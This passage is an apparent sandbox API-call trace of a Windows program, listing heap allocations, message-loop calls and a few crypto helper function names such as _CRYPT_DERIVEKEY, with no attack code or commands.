0x43e2600 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0074.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0074.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0074.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0074.795] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 1 [0074.795] TranslateMessage (lpMsg=0x144f084) returned 0 [0074.795] DispatchMessageW (lpMsg=0x144f084) returned 0x0 [0074.795] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0074.795] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0074.796] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0074.796] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0074.796] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0074.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0074.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0074.797] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca628 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0074.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0074.797] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0074.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0074.798] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0074.798] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0074.798] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0074.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0074.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0074.798] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0074.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0074.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0074.798] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0074.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0074.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0074.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0074.798] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0074.798] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0074.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0074.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23b0 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0074.799] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0074.799] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0074.799] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0074.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0074.799] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0074.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0074.800] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0074.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0074.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2390 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0074.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0074.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23b0 [0074.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0074.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0074.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0074.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0074.801] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0074.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0074.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0074.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0074.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0074.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0074.801] RtlAllocateHeap 